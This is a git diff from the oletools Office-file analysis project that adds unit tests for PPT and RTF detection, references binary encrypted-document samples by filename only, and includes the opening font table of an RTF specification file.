new file mode 100644
index 00000000..b6532570
--- /dev/null
+++ b/tests/ppt_parser/test_basic.py
@@ -0,0 +1,38 @@
+""" Test ppt_parser and ppt_record_parser """
+
+import unittest
+import os
+from os.path import join, splitext
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+from oletools import ppt_record_parser
+# ppt_parser not tested yet
+
+
+class TestBasic(unittest.TestCase):
+ """ test basic functionality of ppt parsing """
+
+ def test_is_ppt(self):
+ """ test ppt_record_parser.is_ppt(filename) """
+ exceptions = ['encrypted.ppt', ] # actually is ppt but embedded
+ for base_dir, _, files in os.walk(DATA_BASE_DIR):
+ for filename in files:
+ if filename in exceptions:
+ continue
+ full_name = join(base_dir, filename)
+ extn = splitext(filename)[1]
+ if extn in ('.ppt', '.pps', '.pot'):
+ self.assertTrue(ppt_record_parser.is_ppt(full_name),
+ msg='{0} not recognized as ppt file'
+ .format(full_name))
+ else:
+ self.assertFalse(ppt_record_parser.is_ppt(full_name),
+ msg='{0} erroneously recognized as ppt'
+ .format(full_name))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/rtfobj/test_is_rtf.py b/tests/rtfobj/test_is_rtf.py
new file mode 100644
index 00000000..ff6f9275
--- /dev/null
+++ b/tests/rtfobj/test_is_rtf.py
@@ -0,0 +1,69 @@
+""" Test rtfobj.is_rtf """
+
+from __future__ import print_function
+
+import unittest
+from os.path import join
+from os import walk
+
+from oletools.rtfobj import is_rtf, RTF_MAGIC
+
+# Directory with test data, independent of current working directory
+from tests.test_utils import DATA_BASE_DIR
+
+
+class TestIsRtf(unittest.TestCase):
+ """ Tests rtfobj.is_rtf """
+
+ def test_bytearray(self):
+ """ test that is_rtf works with bytearray """
+ self.assertTrue(is_rtf(bytearray(RTF_MAGIC + b'asdfasdfasdfasdfasdf')))
+ self.assertFalse(is_rtf(bytearray(RTF_MAGIC.upper() + b'asdfasdasdff')))
+ self.assertFalse(is_rtf(bytearray(b'asdfasdfasdfasdfasdfasdfsdfsdfa')))
+
+ def test_bytes(self):
+        """ test that is_rtf works with bytes """
+ self.assertTrue(is_rtf(RTF_MAGIC + b'asasdffdfasdfasdfasdfasdf', True))
+ self.assertFalse(is_rtf(RTF_MAGIC.upper() + b'asdffasdfasdasdff', True))
+ self.assertFalse(is_rtf(b'asdfasdfasdfasdfasdfasdasdfffsdfsdfa', True))
+
+ def test_tuple(self):
+ """ test that is_rtf works with byte tuples """
+ data = tuple(byte_char for byte_char in RTF_MAGIC + b'asdfasfadfdfsdf')
+ self.assertTrue(is_rtf(data))
+
+ data = tuple(byte_char for byte_char in RTF_MAGIC.upper() + b'asfasdf')
+ self.assertFalse(is_rtf(data))
+
+ data = tuple(byte_char for byte_char in b'asdfasfassdfsdsfeereasdfwdf')
+ self.assertFalse(is_rtf(data))
+
+ def test_iterable(self):
+ """ test that is_rtf works with byte iterables """
+ data = (byte_char for byte_char in RTF_MAGIC + b'asdfasfasasdfasdfddf')
+ self.assertTrue(is_rtf(data))
+
+ data = (byte_char for byte_char in RTF_MAGIC.upper() + b'asdfassfasdf')
+ self.assertFalse(is_rtf(data))
+
+ data = (byte_char for byte_char in b'asdfasfasasdfasdfasdfsdfdwerwedf')
+ self.assertFalse(is_rtf(data))
+
+ def test_files(self):
+ """ test on real files """
+ for base_dir, _, files in walk(DATA_BASE_DIR):
+ for filename in files:
+ full_path = join(base_dir, filename)
+ expect = filename.endswith('.rtf')
+ self.assertEqual(is_rtf(full_path), expect,
+ 'is_rtf({0}) did not return {1}'
+ .format(full_path, expect))
+ with open(full_path, 'rb') as handle:
+ self.assertEqual(is_rtf(handle), expect,
+ 'is_rtf(open({0})) did not return {1}'
+ .format(full_path, expect))
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/rtfobj/test_issue_185.py b/tests/rtfobj/test_issue_185.py
index cf8358eb..cbfc97f6 100644
--- a/tests/rtfobj/test_issue_185.py
+++ b/tests/rtfobj/test_issue_185.py
@@ -1,11 +1,11 @@
import unittest, sys, os
-from .. import testdata_reader
+from tests.test_utils import testdata_reader
from oletools import rtfobj
class TestRtfObjIssue185(unittest.TestCase):
def test_skip_space_after_bin_control_word(self):
- data = testdata_reader.read('rtfobj/issue_185.rtf')
+ data = testdata_reader.read_encrypted('rtfobj/issue_185.rtf.zip')
rtfp = rtfobj.RtfObjParser(data)
rtfp.parse()
objects = rtfp.objects
diff --git a/tests/rtfobj/test_issue_251.py b/tests/rtfobj/test_issue_251.py
new file mode 100644
index 00000000..9968538f
--- /dev/null
+++ b/tests/rtfobj/test_issue_251.py
@@ -0,0 +1,16 @@
+import unittest, sys, os
+
+from tests.test_utils import testdata_reader
+from oletools import rtfobj
+
+class TestRtfObjIssue251(unittest.TestCase):
+ def test_bin_no_param(self):
+ data = testdata_reader.read('rtfobj/issue_251.rtf')
+ rtfp = rtfobj.RtfObjParser(data)
+ rtfp.parse()
+ objects = rtfp.objects
+
+ self.assertTrue(len(objects) == 1)
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/test-data/basic/encrypted.docx b/tests/test-data/basic/encrypted.docx
new file mode 100644
index 00000000..0f7a9168
Binary files /dev/null and b/tests/test-data/basic/encrypted.docx differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls
new file mode 100644
index 00000000..65c2ac73
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb
new file mode 100644
index 00000000..b905d7cb
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm
new file mode 100644
index 00000000..2b2e1131
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls
new file mode 100644
index 00000000..c61f12bb
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb
new file mode 100644
index 00000000..3518a20b
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm
new file mode 100644
index 00000000..b9cce05a
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx
new file mode 100644
index 00000000..c6772272
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx differ
diff --git a/tests/test-data/encrypted/encrypted.doc b/tests/test-data/encrypted/encrypted.doc
new file mode 100644
index 00000000..cf553d74
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.doc differ
diff --git a/tests/test-data/encrypted/encrypted.docm b/tests/test-data/encrypted/encrypted.docm
new file mode 100644
index 00000000..92d608ae
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.docm differ
diff --git a/tests/test-data/encrypted/encrypted.docx b/tests/test-data/encrypted/encrypted.docx
new file mode 100644
index 00000000..06d9e87b
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.docx differ
diff --git a/tests/test-data/encrypted/encrypted.ppt b/tests/test-data/encrypted/encrypted.ppt
new file mode 100644
index 00000000..86710447
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.ppt differ
diff --git a/tests/test-data/encrypted/encrypted.pptm b/tests/test-data/encrypted/encrypted.pptm
new file mode 100644
index 00000000..f26e0ff4
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.pptm differ
diff --git a/tests/test-data/encrypted/encrypted.pptx b/tests/test-data/encrypted/encrypted.pptx
new file mode 100644
index 00000000..108057ec
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.pptx differ
diff --git a/tests/test-data/encrypted/encrypted.xls b/tests/test-data/encrypted/encrypted.xls
new file mode 100644
index 00000000..75d010aa
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xls differ
diff --git a/tests/test-data/encrypted/encrypted.xlsb b/tests/test-data/encrypted/encrypted.xlsb
new file mode 100644
index 00000000..10fa81e4
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsb differ
diff --git a/tests/test-data/encrypted/encrypted.xlsm b/tests/test-data/encrypted/encrypted.xlsm
new file mode 100644
index 00000000..e43e0b0a
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsm differ
diff --git a/tests/test-data/encrypted/encrypted.xlsx b/tests/test-data/encrypted/encrypted.xlsx
new file mode 100644
index 00000000..16668578
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsx differ
diff --git a/tests/test-data/msodde-doc/dde-test.doc b/tests/test-data/msodde-doc/dde-test.doc
deleted file mode 100644
index da5562c8..00000000
Binary files a/tests/test-data/msodde-doc/dde-test.doc and /dev/null differ
diff --git a/tests/test-data/msodde-doc/test_document.doc b/tests/test-data/msodde-doc/test_document.doc
deleted file mode 100644
index 2c1768ff..00000000
Binary files a/tests/test-data/msodde-doc/test_document.doc and /dev/null differ
diff --git a/tests/test-data/msodde-doc/test_document.docx b/tests/test-data/msodde-doc/test_document.docx
deleted file mode 100644
index 4dd22657..00000000
Binary files a/tests/test-data/msodde-doc/test_document.docx and /dev/null differ
diff --git a/tests/test-data/msodde/RTF-Spec-1.7.rtf b/tests/test-data/msodde/RTF-Spec-1.7.rtf
new file mode 100644
index 00000000..76f67c08
--- /dev/null
+++ b/tests/test-data/msodde/RTF-Spec-1.7.rtf
@@ -0,0 +1 @@
+{\rtf1\mac\ansicpg10000\uc1 \deff1\deflang1033\deflangfe1033{\upr{\fonttbl{\f0\fnil\fcharset256\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fnil\fcharset256\fprq2{\*\panose 020b0604020202020204}Arial;}
{\f2\fnil\fcharset256\fprq2{\*\panose 02070309020205020404}Courier New;}{\f3\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}Symbol;}{\f4\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Times;}
{\f5\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Helvetica{\*\falt Arial};}{\f6\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Courier;}{\f7\fnil\fcharset256\fprq2{\*\panose 020b0503030404040204}Geneva;}
{\f8\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Tms Rmn;}{\f9\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}Helv;}{\f10\froman\fcharset77\fprq2{\*\panose 00000000000000000000}MS Serif;}
{\f11\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}MS Sans Serif;}{\f12\fnil\fcharset256\fprq2{\*\panose 02020502060305060204}New York;}{\f13\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}System;}
{\f14\fnil\fcharset2\fprq2{\*\panose 05020102010804080708}Wingdings;}{\f15\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Roman font face;}{\f16\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Modern font face;}
{\f17\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Roman font face;}{\f18\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Modern font face;}{\f19\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Century;}
{\f20\froman\fcharset128\fprq1{\*\panose 00000000000000000000}Mincho{\*\falt ??};}{\f21\froman\fcharset129\fprq2{\*\panose 02030600000101010101}Batang{\*\falt ??};}{\f22\fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??};}
{\f23\froman\fcharset136\fprq2{\*\panose 02020300000000000000}PMingLiU{\*\falt ????};}{\f24\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}Gothic{\*\falt ?????};}{\f25\fmodern\fcharset129\fprq1{\*\panose 00000000000000000000}Dotum{\*\falt ??};}
{\f26\fmodern\fcharset134\fprq1{\*\panose 00000000000000000000}SimHei{\*\falt ??};}{\f27\fmodern\fcharset136\fprq1{\*\panose 00000000000000000000}MingLiU{\*\falt ???};}
{\f28\fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?? ??};}{\f29\froman\fcharset129\fprq1{\*\panose 00000000000000000000}Gulim{\*\falt ??};}
{\f30\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}MS Gothic{\*\falt ?? ????};}{\f31\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f32\fnil\fcharset256\fprq2{\*\panose 020b0a04020102020204}Arial Black;}
{\f33\fmodern\fcharset256\fprq1{\*\panose 020b0509030504030204}Lucida Sans Typewriter{\*\falt Andale Mono};}{\f34\fnil\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana;}
{\f35\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana Ref{\*\falt Verdana};}{\f36\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}Fixedsys;}{\f37\fmodern\fcharset255\fprq1{\*\panose 00000000000000000000}Terminal;}
{\f38\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Small Fonts;}{\f39\fnil\fcharset2\fprq2{\*\panose 00000000000000000000}Marlett;}{\f40\fswiss\fcharset256\fprq2{\*\panose 020b0504020203020204}News Gothic MT;}
{\f41\fscript\fcharset256\fprq2{\*\panose 03010101010101010101}Lucida Handwriting;}{\f42\fswiss\fcharset256\fprq2{\*\panose 020b0602030504090204}Lucida Sans;}{\f43\fswiss\fcharset256\fprq2{\*\panose 020b0602030504020204}Lucida Sans Unicode;}
{\f44\froman\fcharset256\fprq2{\*\panose 02040602050305030304}Book Antiqua;}{\f45\fswiss\fcharset256\fprq2{\*\panose 020b0502020202020204}Century Gothic;}{\f46\fmodern\fcharset256\fprq1{\*\panose 02010509020102010303}OCR A Extended;}
{\f47\froman\fcharset256\fprq2{\*\panose 02040603050505030304}Calisto MT;}{\f48\fswiss\fcharset256\fprq2{\*\panose 020b0306030101010103}Abadi MT Condensed Light;}{\f49\fswiss\fcharset256\fprq2{\*\panose 020e0705020206020404}Copperplate Gothic Bold;}
{\f50\fswiss\fcharset256\fprq2{\*\panose 020e0507020206020404}Copperplate Gothic Light;}{\f51\fdecor\fcharset256\fprq2{\*\panose 04040403030d02020704}Matisse ITC;}{\f52\fdecor\fcharset256\fprq2{\*\panose 04020404030d07020202}Tempus Sans ITC;}
{\f53\fdecor\fcharset256\fprq2{\*\panose 04040506030f02020702}Westminster;}{\f54\fmodern\fcharset256\fprq1{\*\panose 020b0609040504020204}Lucida Console;}{\f55\fnil\fcharset256\fprq2{\*\panose 030f0702030302020204}Comic Sans MS;}
{\f56\fnil\fcharset256\fprq2{\*\panose 020b0806030902050204}Impact;}{\f57\fnil\fcharset2\fprq2{\*\panose 05030102010509060703}Webdings;}{\f58\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarBats;}
{\f59\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarMath;}{\f60\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Arioso;}{\f61\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}ChevaraOutline;}
{\f62\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Chevara;}{\f63\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Conga;}{\f64\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}HelmetCondensed;}
{\f65\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Helmet;}{\f66\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Timmons;}{\f67\fswiss\fcharset256\fprq2{\*\panose 020e0802040304020204}Albertus Extra Bold;}
{\f68\fswiss\fcharset256\fprq2{\*\panose 020e0602030304020304}Albertus Medium;}{\f69\fswiss\fcharset256\fprq2{\*\panose 020b0603020204030204}Antique Olive;}{\f70\fswiss\fcharset256\fprq2{\*\panose 020b0506020203020204}Arial Narrow;}
{\f71\froman\fcharset256\fprq2{\*\panose 02050604050505020204}Bookman Old Style;}{\f72\froman\fcharset256\fprq2{\*\panose 02040603050505020303}Century Schoolbook;}{\f73\fswiss\fcharset256\fprq2{\*\panose 020b0502050508020304}CG Omega;}
{\f74\froman\fcharset256\fprq2{\*\panose 02020603050405020304}CG Times;}{\f75\froman\fcharset256\fprq2{\*\panose 02040706040705040204}Clarendon Condensed;}{\f76\fscript\fcharset256\fprq2{\*\panose 03030502040406070605}Coronet;}
{\f77\froman\fcharset256\fprq2{\*\panose 02020502050306020203}Garamond;}{\f78\fmodern\fcharset256\fprq1{\*\panose 020b0409020202030204}Letter Gothic;}{\f79\fscript\fcharset256\fprq2{\*\panose 03020702040402020504}Marigold;}
{\f80\fscript\fcharset256\fprq2{\*\panose 03010101010201010101}Monotype Corsiva;}{\f81\fnil\fcharset2\fprq2{\*\panose 01010601010101010101}Monotype Sorts;}{\f82\fswiss\fcharset256\fprq2{\*\panose 020b0603020202030204}Univers;}
{\f83\fswiss\fcharset256\fprq2{\*\panose 020b0606020202060204}Univers Condensed;}{\f84\fnil\fcharset256\fprq2{\*\panose 02040502050405020303}Georgia;}{\f85\fnil\fcharset256\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}
{\f86\fnil\fcharset256\fprq2{\*\panose 020b0509000000000004}Andale Mono;}{\f87\froman\fcharset256\fprq2{\*\panose 00050102010706020507}Map Symbols;}{\f88\fswiss\fcharset128\fprq2{\*\panose 020b0604020202020204}Arial Unicode MS;}
{\f89\fswiss\fcharset256\fprq2{\*\panose 020b0706040902060204}Haettenschweiler;}{\f90\fnil\fcharset2\fprq2{\*\panose 05000000000000000000}MS Outlook;}{\f91\froman\fcharset2\fprq2{\*\panose 05020102010507070707}Wingdings 2;}
{\f92\froman\fcharset2\fprq2{\*\panose 05040102010807070707}Wingdings 3;}{\f93\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}MT Extra;}{\f94\fswiss\fcharset256\fprq2{\*\panose 020b0602020203020303}HoratioDMed;}
{\f95\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Arabic Transparent;}{\f96\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Traditional Arabic;}{\f97\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David;}
{\f98\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David Transparent;}{\f99\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam;}{\f100\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Miriam Fixed;}
{\f101\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Fixed Miriam Transparent;}{\f102\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam Transparent;}{\f103\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Rod;}
{\f104\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}@MS Mincho;}{\f105\fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\f106\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Times New Roman CE;}
{\f107\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Times New Roman Cyr;}{\f108\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Times New Roman Greek;}{\f109\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Times New Roman Tur;}
{\f110\froman\fcharset177\fprq2{\*\panose 00000000000000000000}Times New Roman (Hebrew);}{\f111\froman\fcharset178\fprq2{\*\panose 00000000000000000000}Times New Roman (Arabic);}
{\f112\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Times New Roman Baltic;}{\f113\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial CE;}{\f114\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Cyr;}
{\f115\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Greek;}{\f116\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Tur;}{\f117\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial (Hebrew);}
{\f118\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial (Arabic);}{\f119\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Baltic;}{\f120\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Courier New CE;}
{\f121\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Courier New Cyr;}{\f122\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Courier New Greek;}{\f123\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Courier New Tur;}
{\f124\fmodern\fcharset177\fprq1{\*\panose 00000000000000000000}Courier New (Hebrew);}{\f125\fmodern\fcharset178\fprq1{\*\panose 00000000000000000000}Courier New (Arabic);}
{\f126\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Courier New Baltic;}{\f127\froman\fcharset256\fprq2{\*\panose 00000000000000000000}Batang Western{\*\falt ??};}
{\f128\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Batang CE{\*\falt ??};}{\f129\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Batang Cyr{\*\falt ??};}
{\f130\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Batang Greek{\*\falt ??};}{\f131\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Batang Tur{\*\falt ??};}
{\f132\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Batang Baltic{\*\falt ??};}{\f133\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}SimSun Western{\*\falt ??};}
{\f134\froman\fcharset256\fprq2{\*\panose 00000000000000000000}PMingLiU Western{\*\falt ????};}{\f135\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}MS Mincho Western{\*\falt ?? ??};}
{\f136\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}MS Mincho CE{\*\falt ?? ??};}{\f137\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}MS Mincho Cyr{\*\falt ?? ??};}
{\f138\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}MS Mincho Greek{\*\falt ?? ??};}{\f139\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}MS Mincho Tur{\*\falt ?? ??};}
{\f140\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}MS Mincho Baltic{\*\falt ?? ??};}{\f141\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century CE;}{\f142\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Century Cyr;}
{\f143\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Century Greek;}{\f144\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Tur;}{\f145\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Baltic;}
{\f146\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Tahoma CE;}{\f147\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Tahoma Cyr;}{\f148\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Tahoma Greek;}
{\f149\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma Tur;}{\f150\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Tahoma (Hebrew);}{\f151\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Tahoma (Arabic);}
{\f152\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Tahoma Baltic;}{\f153\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Black CE;}{\f154\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Black Cyr;}
{\f155\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Black Greek;}{\f156\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Black Tur;}{\f157\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Black Baltic;}
{\f158\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana CE;}{\f159\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Cyr;}{\f160\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Greek;}
{\f161\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Tur;}{\f162\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Baltic;}{\f163\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana Ref CE{\*\falt Tahoma};}
{\f164\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Ref Cyr{\*\falt Tahoma};}{\f165\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Ref Greek{\*\falt Tahoma};}
{\f166\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Ref Tur{\*\falt Tahoma};}{\f167\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Ref Baltic{\*\falt Tahoma};}
{\f168\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode CE;}{\f169\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Cyr;}
{\f170\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Greek;}{\f171\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Tur;}
{\f172\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode (Hebrew);}{\f173\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Book Antiqua CE;}{\f174\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Book Antiqua Cyr;}
{\f175\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Book Antiqua Greek;}{\f176\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Book Antiqua Tur;}{\f177\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Book Antiqua Baltic;}
{\f178\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Century Gothic CE;}{\f179\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Century Gothic Cyr;}{\f180\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Century Gothic Greek;}
{\f181\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Century Gothic Tur;}{\f182\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Century Gothic Baltic;}{\f183\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Lucida Console CE;}
{\f184\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Lucida Console Cyr;}{\f185\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Lucida Console Greek;}{\f186\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Lucida Console Tur;}
{\f187\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Comic Sans MS CE;}{\f188\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Comic Sans MS Cyr;}{\f189\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Comic Sans MS Greek;}
{\f190\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Comic Sans MS Tur;}{\f191\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Comic Sans MS Baltic;}{\f192\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Impact CE;}
{\f193\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Impact Cyr;}{\f194\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Impact Greek;}{\f195\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Impact Tur;}
{\f196\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Impact Baltic;}{\f197\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold CE;}{\f198\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Tur;}
{\f199\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Baltic;}{\f200\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Medium CE;}
{\f201\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Medium Tur;}{\f202\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Medium Baltic;}{\f203\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Antique Olive CE;}
{\f204\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Antique Olive Tur;}{\f205\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Antique Olive Baltic;}{\f206\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Narrow CE;}
{\f207\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Narrow Tur;}{\f208\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Narrow Baltic;}{\f209\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Bookman Old Style CE;}
{\f210\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Bookman Old Style Cyr;}{\f211\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Bookman Old Style Greek;}
{\f212\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Bookman Old Style Tur;}{\f213\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Bookman Old Style Baltic;}
